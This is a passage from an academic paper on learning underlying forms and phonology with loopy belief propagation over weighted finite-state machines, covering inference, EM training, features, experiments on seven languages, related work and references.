morphology (Hulden, 2009), infixation, or circumfixation. Although only regular factors are allowed in our graphical model, a loopy graphical model with multiple such factors can actually capture non- regular phenomena, for example by using auxil- iary variables (Dreyer and Eisner, 2009, §3.4). Ap- proximate inference then proceeds by loopy BP on this model. In particular, reduplication is not reg- ular if unbounded, but we can adopt morphologi- cal doubling theory (Inkelas and Zoll, 2005) and model it by having U concatenate two copies of the same morph. During inference of URs, this morph exchanges messages with two substrings of the underlying word. 6Mφ has a single state, with halt probability φ and the remaining probability 1 − φ divided among self-loop arcs labeled with the phonemes in Σu. U must concatenate k morphs by copying all of tape 1, then tape 2, etc., to tape k + 1: this is easily done using k + 1 states, and arcs of probability 1. Sθ is constructed as in Cotterell et al. (2014). 7In general, a U factor enforces u = U(m1, . . . ,mk), so it is a degree-(k + 1) factor, represented by a (k + 1)- tape WFSM connecting these variables (Dreyer and Eis- ner, 2009). If one’s finite-state library is limited to 2- tape WFSMs, then one can simulate the U factor us- ing (1) an auxiliary string variable π encoding the path through U, (2) a unary factor weighting π according to U, (3) a set of binary factors relating π to each of u,m1, . . . ,mk. The standard case u = m1# . . . #mk can be handled more easily. Given factor U’s incoming mes- sages µ·→U , each being a 1-tape WFSM, compute its loopy BP outgoing messages µU→u = µm1→U # · · ·#µmk→U and (e.g.) µU→m2 = range(µu→U ◦ ((µm1→U # × �) Σ∗u (#µm3→U # · · ·#µmk→U × �))). Similarly, we can manipulate the graphical model structure to encode cyclic phonology—i.e., concatenating a word SR with a derivational affix UR and passing the result through Sθ once again. An alternative is to encode this hierarchical struc- ture into the word UR u, by encoding level-1 and level-2 boundaries with different symbols. A sin- gle application of Sθ can treat these boundaries differently: for example, by implementing cyclic phonology as a composition of two transductions. 4.4 Loopy BP implementation details Each loopy BP message to or from a random variable is a 1-tape WFSM (acceptor) that scores all possible values of that variable (given by the set M, U, or S: see section 2). We initialized each message to the uniform distribution.8 We then updated the messages serially, alternating be- tween upward and downward sweeps through the Bayesian network. After 10 iterations we stopped and computed the final belief at each variable. A complication is that a popular affix such as /z/ (in layer 1) receives messages from hundreds of words that realize that affix. Loopy BP obtains that affix’s belief and outgoing messages by intersect- ing all these WFSMs—which can lead to astro- nomically large results and runtimes. We address this for now with a simple pruning approximation where at each variable m, we dynamically restrict to a finite support set of plausible values for m. We take this to be the union of the 20-best lists of all messages sent to m.9 We modify those mes- sages so that strings in m’s support set have un- changed weight, but all other strings have weight 0. As a result, m’s outgoing messages and belief are also confined to its support set. Note that the support set is not hand-specified, but determined automatically by taking the best hypotheses under the probability model. Improved approaches with no pruning are pos- sible. After submitting this paper, we devel- oped a penalized expectation propagation method (Cotterell and Eisner, 2015). It approximates the messages using log-linear functions (based on variable-order n-gram features) whose support is the entire space Σ∗ . We also developed a dual 8This is standard—although the uniform distribution over the space of strings is actually an improper distribution. It is expressed by a single-state WFSM whose arcs have weight 1. 9In general, we should update this support set dynami- cally as inference and learning improve the messages. But in our present experiments, that appears unnecessary, since the initial support set always appears to contain the “correct” UR. decomposition method (Peng et al., 2015), which if it converges, exactly recovers the single most probable explanation of the data10 given φ and θ. 5 Parameter Learning We employ MAP-EM as the learning algorithm. The E-step is approximated by the loopy BP algo- rithm of section 4. The M-step takes the resulting beliefs, together with the prior of section 3.4, and uses them to reestimate the parameters θ and φ. If we knew the true UR uk for each observed word type sk, we would just do supervised training of θ, using L-BFGS (Liu and Nocedal, 1989) to locally maximize θ’s posterior log-probability ( ∑ k log Sθ(sk | uk)) + log pprior(θ) Cotterell et al. (2014) give the natural dynamic programming algorithm to compute each sum- mand and its gradient w.r.t. θ. The gradient is the difference between observed and expected feature vectors of the contextual edits (section 3.2), aver- aged over edit contexts in proportion to how many times those contexts were likely encountered. The latent alignment makes the objective non-concave. In our EM setting, uk is not known. So our M- step replaces log Sθ(sk | uk) with its expectation,∑ uk bk(uk) log Sθ(sk | uk), where bk is the nor- malized belief about uk computed by the previ- ous E-step. Since bk and Sθ are both represented by WFSMs (with 1 and 2 tapes respectively), it is possible to compute this quantity and its gradient exactly, using finite-state composition in a second- order expectation semiring (Li and Eisner, 2009). For speed, however, we currently prune bk back to the 5-best values of uk. This lets us use a sim- pler and faster approach: a weighted average over 5 runs of the Cotterell et al. (2014) algorithm. Our asymptotic runtime benefits from the fact that our graphical model is directed (so our objec- tive does not have to contrast with all other values of uk) and the fact that Sθ is locally normalized (so our objective does not have to contrast with all other values of sk for each uk). In practice we are far faster than Dreyer and Eisner (2009). We initialized the parameter vector θ to ~0, ex- cept for setting the weight of the COPY feature (section 6) such that the probability of a COPY edit is 0.99 in every context other than end-of-string. This encourages URs to resemble their SRs. 10That is, a lexicon of morphs together with contextual edit sequences that will produce the observed word SRs. BIGRAM(strident,strident) adjacent surface stridents BIGRAM(�,uvular) surface uvular EDIT([s],[z]) /s/ became [z] EDIT(coronal,labial) coronal became labial EDIT(�, phoneme) phoneme was inserted EDIT(consonant,�) consonant was deleted Table 1: Examples of markedness and faithfulness features that fire in our model. They have a natural interpretation as Optimality-Theoretic constraints. � denotes the empty string. The natural classes were adapted from (Riggle, 2005). To reestimate φ, the M-step does not need to use L-BFGS, for section 3.3’s simple model of Mφ and uniform prior over φ ∈ (0, 1]. It simply sets φ = 1/(` + 1) where ` is the average expected length of a UR according to the previous E-step. The expected length of each uk is extracted from the WFSM for the belief bk, using dynamic pro- gramming (Li and Eisner, 2009). We initialized φ to 0.1; experiments on development data sug- gested that the choice of initializer had little effect. 6 Features of the Phonology Model Our stochastic edit process Sθ(s | u) assigns a probability to each possible u-to-s edit sequence. This edit sequence corresponds to a character-wise alignment of u to s. Our features for modeling the contextual probability of each edit are loosely inspired by constraints from Harmonic Grammar and Optimality Theory (Smolensky and Legendre, 2006). Such constraints similarly evaluate a u-to- s alignment (or “correspondence”). They are tra- ditionally divided into markedness constraints that encourage a well-formed s, and faithfulness con- straints that encourage phonemes of s to resemble their aligned phonemes in u. Our EDIT faithfulness features evaluate an edit’s (input, output) phoneme pair. Our BIGRAM markedness features evaluate an edit that emits a new phoneme of s. They evaluate the surface bi- gram it forms with the previous output phoneme.11 Table 1 shows example features. Notice that these features back off to various natural classes of phonemes (Clements and Hume, 1995). These features of an edit need to examine at most (0,1,1) phonemes of (left input, right input, left output) context respectively (see Figure 2). So the PFST that implements Sθ should be able to use what Cotterell et al. (2014) calls a (0,1,1) topol- ogy. However, we actually used a (0,2,1) topology, 11At beginning-of-string, the previous “phoneme” is the special symbol BOS. For the HALT edit at end-of-string, which copies the symbol EOS, the new “phoneme” is EOS. to allow features that also look at the “upcoming” input phoneme that immediately follows the edit’s input (/@/ in Figure 2). Specifically, for each nat- ural class, we also included contextual versions of each EDIT or BIGRAM feature, which fired only if the “upcoming” input phoneme fell in that natu- ral class. Contextual BIGRAM features are our ap- proximation to surface trigram features that look at the edit’s output phoneme together with the pre- vious and next output phonemes. (A PFST can- not condition its edit probabilities on the next out- put phoneme because that has not been generated yet—see section 3.2—so we are using the upcom- ing input phoneme as a proxy.) Contextual EDIT features were cheap to add once we were using a (0,2,1) topology, and in fact they turned out to be helpful for capturing processes such as Catalan’s deletion of the underlyingly final consonant. Finally, we included a COPY feature that fires on any edit where surface and underlying phonemes are exactly equal. (This feature resem- bles Optimality Theory’s IDENT-IO constraint, and ends up getting the strongest weight.) In total, our model has roughly 50,000 binary features. Many improvements to this basic feature set would be possible in future. We cannot currently express implications such as “adjacent obstruents must also agree in voicing,” “a vowel that surfaces must preserve its height,” or “successive vowels must also agree in height.” We also have not yet designed features that are sensitive to surface prosodic boundaries or underlying morph bound- aries. (Prosodic structure and autosegmental tiers are absent from our current representations, and we currently simplify the stochastic edit process’s feature set by having Sθ erase the # morph bound- aries before applying that process.) Our standard prior over θ (section 3.4) resists overfitting in a generic way, by favoring phonolo- gies that are “simple to describe.” Linguistic im- provements are possible here as well. The prior should arguably discourage positive weights more than negative ones, since our features detect con- straint violations that ordinarily reduce probabil- ity. It should also be adjusted to mitigate the cur- rent structural bias against deletion edits, which arises because the single deletion possible in a context must compete on equal footing with |Σs| insertions and |Σs|− 1 substitutions. More ambi- tiously, a linguistically plausible prior should pre- fer phonologies that are conservative (s ≈ u) and have low conditional entropies H(s | u),H(u | s) to facilitate communication. 7 Experimental Design We objectively evaluate our learner on its ability to predict held-out surface forms. This blind testing differs from traditional practice by linguists, who evaluate a manual or automatic analysis (= URs + phonology) on whether it describes the full dataset in a “natural” way that captures “appropriate” gen- eralizations. We avoid such theory-internal evalu- ation by simply quantifying whether the learner’s analysis does generalize (Eisner, 2015). To avoid tailoring to our training/test data, we developed our method, code, features, and hy- perparameters using only two development lan- guages, English and German. Thus, our learner was not engineered to do well on the other 5 lan- guages below: the graphs below show its first at- tempt to learn those languages. We do also eval- uate our learners on English and German, using separate training/test data. We provide all our data (including cita- tions, development data, training-test splits, and natural classes) at http://hubal.cs.jhu.edu/ tacl2015/, along with brief sketches of the phonological phenomena in the datasets, the “gold” stem URs we assumed for evaluation, and our learner’s predictions and error patterns. 7.1 Evaluation methodology Given a probability distribution p over surface word types of a language, we sample a training set of N types without replacement. This simulates reading text until we have seen N distinct types. For each of these frequent words, we observe the SR s and the morpheme sequence ~a. After training our model, we evaluate its beliefs b about the SRs s on a disjoint set of test words whose ~a are observed. To improve interpretabil- ity of the results, we limit the test words to those whose morphemes have all appeared at least once in the training set. (Any method would presumably get other words badly wrong, just as it would get the training words right.) To evaluate our belief b about the SR of a test word (~a,s∗), we use three measures for which “smaller is better.” First, 0-1 loss asks whether s∗ 6= argmaxs b(s). This could be compared with non-probabilistic predictors. Second, the surprisal − log2 b(s∗) is low if the model finds it plausible http://hubal.cs.jhu.edu/tacl2015/ http://hubal.cs.jhu.edu/tacl2015/ Maori Catalan Tangale Indon. 0.0 1.0 2.0 3.0 4.0 5.0 cross entropy (bits) Maori Catalan Tangale Indon. 0.0 0.2 0.4 0.6 0.8 1.0 1.2 expected edit distance Maori Catalan Tangale Indon. 0.0 0.2 0.4 0.6 0.8 1.0 1-best error rate Noisy Concatenation Our Method Oracle Figure 3: Results on the small phonological exercise datasets (≈ 100 word types). Smaller numbers are better. Preliminary tests suggested that the variance of the prior (section 3.4) did not strongly affect the results, so we took σ2 = 5 for all experiments. that s∗ realizes ~a. If so, this holds out promise for future work on analyzing or learning from unan- notated tokens of s∗. Third, we evaluate the whole distribution b in terms of ∑ s b(s)L(s ∗,s) where L is unweighted Levenshtein distance. We take the average of each measure over test words, weighting those words according to p. This yields our three reported metrics: 1-best error rate, cross-entropy, and expected edit distance. Each metric is the expected value of some mea- sure on a random test token. These metrics are actually random variables, since they depend on the randomly sampled train- ing set and the resulting test distribution. We re- port the expectations of these random variables by running many training-test splits (see section 7.2). 7.2 Datasets To test discovery of interesting patterns from lim- ited data, we ran our learner on 5 “exercises” drawn from phonology textbooks (102 English nouns, 68 Maori verbs, 72 Catalan adjectives, 55 Tangale nouns, 44 Indonesian nouns), exhibiting a diverse range of phenomena. In each case we took p to be the uniform distribution over the pro- vided word types. We took N to be one less than the number of provided types. So to report our expected metrics, we ran all N + 1 experiments where we trained jointly on N forms and tested on the 1 remaining form. This is close to linguists’ practice of fitting an analysis on the entire dataset, yet it is a fair test. To test on larger, naturally occurring datasets, we ran our learner on subsets of the CELEX database (Baayen et al., 1995), which provides surface phonological forms and token counts for German, Dutch, and English words. For each language, we constructed a coherent subcorpus of 1000 nouns and verbs, focusing on inflections with common phonological phenomena. These turned out to involve mainly voicing: final obstru- ent devoicing (German 2nd-person present indica- tive verbs, German nominative singular nouns, Dutch infinitive verbs, Dutch singular nouns) and voicing assimilation (English past tense verbs, En- glish plural nouns). We were restricted to rela- tively simple phenomena because our current rep- resentations are simple segmental strings that lack prosodic and autosegmental structure. In future we plan to consider stress, vowel harmony, and templatic morphology. We constructed the distribution p in proportion to CELEX’s token counts. In each language, we trained on N = 200, 400, 600, or 800 forms sam- pled from p. To estimate the expectation of each metric over all training sets of size N, we report the sample mean and bootstrap standard error over 10 random training sets of size N. Except in Indonesian, every word happens to consist of at most two morphemes (one stem plus one possibly empty suffix). In all experiments, we take the phonological inventories Σu and Σs to be given as the set of all surface phonemes observed in training ∪ test. 7.3 Comparison systems There do not appear to be previous systems that perform our generalization task. Therefore, we compared our own system against variants. We performed an ablation study to determine whether the learned phonology was helpful. We substituted a simplified phonology model where Sθ(s | u) just decays exponentially with the edit distance between s and u; the decay rate was learned by EM as usual. That is, this model uses only the COPY feature of section 6. This baseline system treats phonology as “noisy concatenation” of learned URs, not trying to model its regularity. 0.00 0.05 0.10 0.15 0.20 0.25 1- be st e rr or ra te German 0.05 0.10 0.15 0.20 0.25 0.30 Dutch 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 English Noisy Concatenation Our Method Oracle 0.0 0.5 1.0 1.5 2.0 2.5 3.0 cr os s- en tr op y (b its ) 0.0 0.5 1.0 1.5 2.0 2.5 3.0 0.0 1.0 2.0 3.0 4.0 5.0 6.0 200 400 600 800 0.00 0.05 0.10 0.15 0.20 0.25 0.30 ex pe ct ed e di t d is ta nc e 200 400 600 800 0.05 0.10 0.15 0.20 0.25 0.30 0.35 0.40 0.45 0.50 200 400 600 800 0.0 0.2 0.4 0.6 0.8 1.0 1.2 Figure 4: Results on the CELEX datasets (1000 word types) at 4 different training set sizes N. The larger training sets were supersets of the smaller ones, obtained by continuing to sample with replacement from p. For each training set, the unconnected points evaluate all words /∈ training whose morphemes ∈ training. Meanwhile, the connected points permit comparison across the 4 values of N, by evaluating only on a common test set found by intersecting the 4 unconnected test sets. Each point estimates the metric’s expectation over all ways of sampling the 4 training sets; specifically, we plot the sample mean from 10 such runs, with error bars showing a bootstrap estimate of the standard error of the mean. Non-overlapping error bars at a given N always happen to imply that the difference in the two methods’ sample means is too extreme to be likely to have arisen by chance (paired permutation test, p < 0.05). Each time we evaluated some training-test split on some metric, we first tuned σ2 (section 3.4) by a coarse grid search where we trained on the first 90% of the training set and evaluated on the remaining 10%. We considered an additional ablation study to determine whether the learned URs were helpful. However, we did not come up with a plausible heuristic for identifying URs in some simpler way. Thus, instead we asked whether the learned URs were as good as hand-constructed URs. Our “ora- cle” system was allowed to observe gold-standard URs for stems instead of inferring them. This system is still fallible: it must still infer the af- fix URs by belief propagation, and it must still use MAP-EM to estimate a phonology within our current model family Sθ. Even with supervision, this family will still struggle to model many types of phonology, e.g., ablaut patterns (in Germanic strong verbs) and many stress-related phenomena. 7.4 Results We graph our results in Figures 3 and 4. When given enough evidence, our method works quite well across the 7 datasets. For 94–98% of held-out words on the CELEX languages (when N = 800), Phon. Exercises CELEX Maori 95.5 German 99.9 Catalan 99.5 Dutch 86.3 Tangale 79.8 English 82.2 Indonesian 100 Table 2: Percent of training words, weighted by the distribu- tion p, whose 1-best recovered UR (including the boundary #) exactly matches the manual “gold” analysis. Results are av- erages over all runs (with N = 800 for the CELEX datasets). and 77–100% on the phonological exercises, our method’s top pick is the correct surface form. Fur- ther, the other metrics show that it places most of its probability mass on that form,12 and the rest on highly similar forms. Notably, our method’s pre- dictions are nearly as good as if gold stem URs had been supplied (the “oracle” condition). Indeed, it does tend to recover those gold URs (Table 2). Yet there are some residual errors in predict- ing the SRs. Our phonological learner cannot 12Cross-entropy < 1 bit means that the correct form has probability > 1/2 on average (using geometric mean). perfectly learn the UR-to-SR mapping even from many well-supervised pairs (the oracle condition). In the CELEX and Tangale datasets, this is partly due to irregularity in the language itself. However, error analysis suggests we also miss some gener- alizations due to the imperfections of our current Sθ model (as discussed in sections 3.2 and 6). When given less evidence, our method’s perfor- mance is more sensitive to the training sample and is worse on average. This is expected: e.g., a stem’s final consonant cannot be reconstructed if it was devoiced (German) or deleted (Maori) in all the training SRs. However, a contributing factor may be the increased error rate of the phonolog- ical learner, visible even with oracle data. Thus, we suspect that a Sθ model with better gener- alization would improve our results at all train- ing sizes. Note that harming Sθ—allowing only “noisy concatenation”—clearly harms the method, proving the need for true phonological modeling. 8 Related Work Jarosz (2013, §2) and Tesar (2014, chapters 5– 6) review work on learning the phonology Sθ. Phonologists pioneered stochastic-gradient and passive-aggressive training methods—the Gradual Learning Algorithm (Boersma, 1998) and Error- Driven Constraint Demotion (Tesar and Smolen- sky, 1998)—for structured prediction of the sur- face word s from the underlying word u. If s is not fully observed during training (we illustrate why in layer 4 of Figure 1), then it can be imputed, a step known as Robust Interpretive Parsing. Recent papers consider our setting where u = m1#m2# · · · is not observed either. The contrast analysis method (Tesar, 2004; Merchant, 2008) in effect uses constraint propagation (Dechter, 2003). That is, it serially eliminates variable values (de- scribing aspects of the URs or the constraint rank- ing) that are provably incompatible with the data. Constraint propagation is an incomplete method that is not guaranteed to make all logical de- ductions. We use its probabilistic generalization, loopy belief propagation (Dechter et al., 2010)— which is still approximate but can deal with noise and stochastic irregularity. A further improvement is that we work with string-valued variables, repre- senting uncertainty using WFSMs; this lets us rea- son about URs of unknown length and unknown alignment to the SRs. (Tesar and Merchant in- stead used binary variables, one for each segmen- tal feature in each UR, requiring the simplifying assumption that the URs are known except for their segmental features. They assume that SRs are annotated with morph boundaries and that the phonology only changes segmental features, never inserting or deleting segments.) On the other hand, Tesar and Merchant reason globally about the con- straint ranking, whereas in this paper, we only lo- cally improve the phonology—we use EM, rather than the full Bayesian approach that treats the pa- rameters ~θ as variables within BP. Jarosz (2006) is closest to our work in that she uses EM, just as we do, to maximize the probabil- ity of observed surface forms whose constituent morphemes (but not morphs) are known.13 Her model is a probabilistic analogue of Apoussidou (2006), who uses a latent-variable structured per- ceptron. A non-standard aspect of this model (de- fended by Pater et al. (2012)) is that a morpheme a can stochastically choose different morphs M(a) when it appears in different words. To obtain a sin- gle shared morph, one could penalize this distribu- tion’s entropy, driving it toward 0 as learning pro- ceeds. Such an approach—which builds on a sug- gestion by Eisenstat (2009, §5.4)—would loosely resemble dual decomposition (Peng et al., 2015). Unlike our BP approach, it would maximize rather than marginalize over possible morphs. Our work has focused on scaling up inference. For the phonology S, the above papers learn the weights or rankings of just a few plausible con- straints (or Jarosz (2006) learns a discrete distribu- tion over all 5! = 120 rankings of 5 constraints), whereas we use Sθ with roughly 50,000 con- straints (features) to enable learning of unknown languages. Our S also allows exceptions. The above papers also consider only very restricted sets of morphs, either identifying a small set of plausible morphs or prohibiting segmental inser- tion/deletion. We use finite-state methods so that it is possible to consider the space Σ∗u of all strings. On the other hand, we are divided from pre- vious work by our inability to use an OT gram- mar (Prince and Smolensky, 2004), a stochastic OT grammar (Boersma, 1997), or even a maxi- mum entropy grammar (Goldwater and Johnson, 2003; Dreyer et al., 2008; Eisenstat, 2009). The reason is that our BP method inverts the phono- logical mapping Sθ to find possible word URs. 13She still assumes that word SRs are annotated with mor- pheme boundaries, and that a small set of possible morphs is given. These assumptions are relaxed by Eisenstat (2009). Given a word SR s, we construct a WFSM (mes- sage) that scores every possible UR u ∈ Σ∗u —the score of u is Sθ(s | u). To accomplish this step without approximation, our method needs Sθ itself to be represented as a WFSM (section 3.2). (The WFSM for a maximum entropy grammar unfortu- nately does not compute Sθ but only an unnormal- ized version. A different normalizing constant is needed for each u, akin to the “double intractabil- ity” problem in Bayesian learning.) In the NLP community, Elsner et al. (2013) re- sembles our work in many respects. Like us, they recover a latent underlying lexicon (using the same simple prior Mφ) and use EM to learn a phonol- ogy (rather similar to our Sθ, though less power- ful).14 Unlike us, they do not assume annotation of the (abstract) morpheme sequence, but jointly learn a nonparametric bigram model to discover the morphemes. Their evaluation is quite different, as their aim is actually to recover underlying words from phonemically transcribed child-directed En- glish utterances. However, nothing in their model distinguishes words from morphemes—indeed, sometimes they do find morphemes instead—so their model could be used in our task. For infer- ence, they invert the finite-state Sθ like us to recon- struct a lattice of possible UR strings. However, they do this not within BP but within a block Gibbs sampler that stochastically reanalyzes utterances one at a time. Whereas our BP tries to find a con- sensus UR for each given morpheme type, their sampler posits morph tokens while trying to reuse frequent morph types, which are interpreted as the morphemes. With observed morphemes (our set- ting), this sampler would fail to mix. Dreyer and Eisner (2009, 2011) like us used loopy BP and MAP-EM to predict morphologi- cal SRs. Their 2011 paper was also able to ex- ploit raw text without morphological supervision. However, they directly modeled pairwise finite- state relationships among the surface word forms without using URs. Their model is a joint distribu- tion over n variables: the word SRs of a single in- flectional paradigm. Since it requires a fixed n, it does not directly extend to derivational morphol- ogy: deriving new words would require adding new variables, which—for an undirected model like theirs—changes the partition function and re- 14Elsner et al. (2012) used an Sθ quite similar to ours though lacking bigram well-formedness features. Elsner et al. (2013) simplified this for efficiency, disallowing segmen- tal deletion and no longer modeling the context of changes. quires retraining. By contrast, our trained directed model is a productive phonological system that can generate unboundedly many new words (see section 4.1). By analogy, n samples from a Gaus- sian would be described with a directed model, and inferring the Gaussian parameters predicts any number of future samples n + 1,n + 2, . . .. Bouchard-Côté et al., in several papers from 2007 through 2013, have used directed graphi- cal models over strings, like ours though without loops, to model diachronic sound change. Some- times they use belief propagation for inference (Hall and Klein, 2010). Their goal is to recover la- tent historical forms (conceptually, surface forms) rather than latent underlying forms. The results are evaluated against manual reconstructions. None of this work has segmented words into morphs, although Dreyer et al. (2008) did seg- ment surface words into latent “regions.” Creutz and Lagus (2005) and Goldsmith (2006) segment an unannotated collection of words into reusable morphs, but without modeling contextual sound change, i.e., phonology. 9 Conclusions and Future Work We have laid out a probabilistic model for gener- ative phonology. This lets us infer likely expla- nations of a collection of morphologically related surface words, in terms of underlying morphs and productive phonological changes. We do this by combining well-motivated algorithms for in- ference in graphical models and MAP estimation from incomplete data, using weighted finite-state machines to encode uncertainty. Throughout our presentation, we were careful to point out various limitations of our setup. But in each case, we also outlined how future work could address these lim- itations within the framework we propose here. Finally, we proposed a detailed scheme for quantitative evaluation of phonological learners. Across 7 different languages, on both small and larger datasets, our learner was able to predict held-out surface forms with low error rates. Acknowledgments This material is based upon work supported by the National Science Foundation under Grant No. 1423276, and by a Fulbright grant to the first au- thor. We thank the anonymous reviewers and Reut Tsarfaty for useful discussion of presentation, ter- minology, and related work. References Diana Apoussidou. 2006. On-line learning of under- lying forms. Technical Report ROA-835, Rutgers Optimality Archive. R Harald Baayen, Richard Piepenbrock, and Leon Gu- likers. 1995. The CELEX lexical database on CD- ROM. Juliette Blevins. 1994. A phonological and morpho- logical reanalysis of the maori passive. Te Reo, 37:29–53. Paul Boersma and Bruce Hayes. 2001. Empirical tests of the gradual learning algorithm. Linguistic In- quiry, 32(1):45–86. Paul Boersma. 1997. How we learn variation, option- ality, and probability. In Proc. of the Institute of Phonetic Sciences of the University of Amsterdam, volume 21, pages 43–58. Paul Boersma. 1998. How we learn variation, op- tionality, and probability. In Functional Phonology: Formalizing the Interactions Between Articulatory and Perceptual Drives, chapter 15. Ph.D. Disserta- tion, University of Amsterdam. Previously appeared in IFA Proceedings (1997), pp. 43–58. Alexandre Bouchard-Côté, Percy Liang, Thomas L. Griffiths, and Dan Klein. 2007. A probabilistic ap- proach to language change. In Proc. of NIPS. Alexandre Bouchard-Côté, David Hall, Thomas L. Griffiths, and Dan Klein. 2013. Automated re- construction of ancient languages using probabilis- tic models of sound change. Proceedings of the Na- tional Academy of Sciences. Noam Chomsky and Morris Halle. 1968. The Sound Pattern of English. Harper and Row. George N Clements and Elizabeth V Hume. 1995. The internal organization of speech sounds. In John Goldsmith, editor, Handbook of Phonological The- ory. Oxford University Press, Oxford. Ryan Cotterell and Jason Eisner. 2015. Penalized expectation propagation for graphical models over strings. In Proceedings of NAACL-HLT, pages 932– 942, Denver, June. Supplementary material (11 pages) also available. Ryan Cotterell, Nanyun Peng, and Jason Eisner. 2014. Stochastic contextual edit distance and probabilistic FSTs. In Proc. of ACL. Mathias Creutz and Krista Lagus. 2005. Inducing the morphological lexicon of a natural language from unannotated text. In Proc. of the International and Interdisciplinary Conference on Adaptive Knowl- edge Representation and Reasoning (AKRR05), vol- ume 1. Rina Dechter, Bozhena Bidyuk, Robert Mateescu, and Emma Rollon. 2010. On the power of belief propagation: A constraint propagation per- spective. In Rina Dechter, Hector Geffner, and Joseph Y. Halpern, editors, Heuristics, Probability and Causality: A Tribute to Judea Pearl. College Publications. Rina Dechter. 2003. Constraint Processing. Morgan Kaufmann. Markus Dreyer and Jason Eisner. 2009. Graphical models over multiple strings. In Proc. of EMNLP, pages 101–110. Markus Dreyer and Jason Eisner. 2011. Discover- ing morphological paradigms from plain text us- ing a dirichlet process mixture model. In Proc. of EMNLP, EMNLP ’11, pages 616–627. Markus Dreyer, Jason R. Smith, and Jason Eisner. 2008. Latent-variable modeling of string transduc- tions with finite-state methods. In Proc. of EMNLP, pages 1080–1089. Markus Dreyer. 2011. A Non-Parametric Model for the Discovery of Inflectional Paradigms from Plain Text Using Graphical Models over Strings. Ph.D. thesis, Johns Hopkins University, Baltimore, MD, April. Sarah Eisenstat. 2009. Learning underlying forms with maxent. Master’s thesis, Brown University, Providence, RI. Jason Eisner. 2002a. Comprehension and compilation in Optimality Theory. In Proc. of ACL, pages 56–63, Philadelphia, July. Jason Eisner. 2002b. Discovering syntactic deep structure via Bayesian statistics. Cognitive Science, 26(3):255–268, May-June. Jason Eisner. 2015. Should linguists evaluate gram- mars or grammar learners? In preparation. Micha Elsner, Sharon Goldwater, and Jacob Eisenstein. 2012. Bootstrapping a unified model of lexical and phonetic acquisition. In Proc. of ACL, pages 184– 193. Micha Elsner, Sharon Goldwater, Naomi Feldman, and Frank Wood. 2013. A joint learning model of word segmentation, lexical acquisition, and phonetic vari- ability. In Proc. of EMNLP, pages 42–54. Alexander M. Fraser, Marion Weller, Aoife Cahill, and Fabienne Cap. 2012. Modeling inflection and word- formation in SMT. In Proc. of EACL, pages 664– 674. J. Goldsmith. 2006. An algorithm for the unsupervised learning of morphology. Natural Language Engi- neering, 12(4):353–371. Sharon Goldwater and Mark Johnson. 2003. Learning OT constraint rankings using a maximum entropy model. In Proc. of the Workshop on Variation within Optimality Theory, pages 113–122, Stockholm Uni- versity. David Hall and Dan Klein. 2010. Finding cognate groups using phylogenies. In Proc. of ACL. Bruce Hayes and Colin Wilson. 2008. A maximum en- tropy model of phonotactics and phonotactic learn- ing. Linguistic Inquiry, 39(3):379–440. Matt Hohensee and Emily M. Bender. 2012. Getting more from morphology in multilingual dependency parsing. In Proc. of NAACL-HLT, pages 315–326. Mans Hulden. 2009. Revisiting multi-tape automata for Semitic morphological analysis and generation. In Proc. of the EACL 2009 Workshop on Computa- tional Approaches to Semitic Languages, pages 19– 26, March. Sharon Inkelas and Cheryl Zoll. 2005. Reduplication: Doubling in Morphology. Number 106 in Cam- bridge Studies in Linguistics. Cambridge University Press. Roman Jakobson. 1948. Russian conjugation. Word, 4:155–167. Gaja Jarosz. 2006. Richness of the base and prob- abilistic unsupervised learning in optimality theory. In Proc. of the Eighth Meeting of the ACL Special In- terest Group on Computational Phonology and Mor- phology, pages 50–59. Gaja Jarosz. 2013. Learning with hidden structure in optimality theory and harmonic grammar: Beyond robust interpretive parsing. Phonology, 30(01):27– 71. C. Douglas Johnson. 1972. Formal Aspects of Phono- logical Description. Mouton. René Kager. 1999. Optimality Theory, volume 2. MIT Press. Ronald M. Kaplan and Martin Kay. 1994. Regu- lar models of phonological rule systems. Compu- tational Linguistics, 20(3):331–378. Michael J Kenstowicz and Charles W Kisseberth. 1979. Generative Phonology. Academic Press San Diego. András Kornai. 1995. Formal Phonology. Garland Publishing, New York. Zhifei Li and Jason Eisner. 2009. First- and second- order expectation semirings with applications to minimum-risk training on translation forests. In Proc. of EMNLP, pages 40–51, Singapore, August. Dong C. Liu and Jorge Nocedal. 1989. On the limited memory BFGS method for large scale optimization. Mathematical Programming, 45(1-3):503–528. Andrew McCallum, Dayne Freitag, and Fernando C. N. Pereira. 2000. Maximum entropy Markov mod- els for information extraction and segmentation. In Proc. of ICML, pages 591–598. Navarré Merchant. 2008. Discovering Underlying Forms: Contrast Pairs and Ranking. Ph.D. thesis, Rutgers University. Available on the Rutgers Opti- mality Archive as ROA-964. Kevin P. Murphy, Yair Weiss, and Michael I. Jordan. 1999. Loopy belief propagation for approximate in- ference: An empirical study. In Proc. of UAI, pages 467–475. Joe Pater, Karen Jesney, Robert Staubs, and Brian Smith. 2012. Learning probabilities over underly- ing representations. In Proc. of the Twelfth Meet- ing of the Special Interest Group on Computational Morphology and Phonology, pages 62–71. Judea Pearl. 1988. Probabilistic Reasoning in In- telligent Systems: Networks of Plausible Inference. Morgan Kaufmann Publishers Inc., San Francisco, CA, USA. Nanyun Peng, Ryan Cotterell, and Jason Eisner. 2015. Dual decomposition inference for graphical models over strings. In Proceedings of EMNLP, Lisbon, September. To appear. Janet Pierrehumbert. 2003. Probabilistic phonology: Discrimination and robustness. In Probabilistic Lin- guistics, pages 177–228. MIT Press. Alan Prince and Paul Smolensky. 2004. Optimality Theory: Constraint Interaction in Generative Gram- mar. Wiley-Blackwell. Jason A. Riggle. 2004. Generation, Recognition, and Learning in Finite State Optimality Theory. Ph.D. thesis, University of California at Los Angeles. Jason Riggle. 2005. Phonological features. Available online at http://www.mml.cam.ac.uk/ dtal/courses/ugrad/paper_support/ li8/riggle-feature-chart.pdf (re- trieved 2014-09-28). David Sankoff. 1978. Probability and linguistic varia- tion. Synthese, 37(2):217–238. Ferdinand de Saussure. 1916. Course in General Lin- guistics. Columbia University Press. English edi- tion of June 2011, based on the 1959 translation by Wade Baskin. Paul Smolensky and Géraldine Legendre. 2006. The Harmonic Mind: From Neural Computation to Optimality-Theoretic Grammar (Vol. 1: Cognitive architecture). MIT Press. Bruce Tesar and Paul Smolensky. 1998. Learnability in Optimality theory. Linguistic Inquiry, 29(2):229– 268. http://www.mml.cam.ac.uk/dtal/courses/ugrad/paper_support/li8/riggle-feature-chart.pdf http://www.mml.cam.ac.uk/dtal/courses/ugrad/paper_support/li8/riggle-feature-chart.pdf 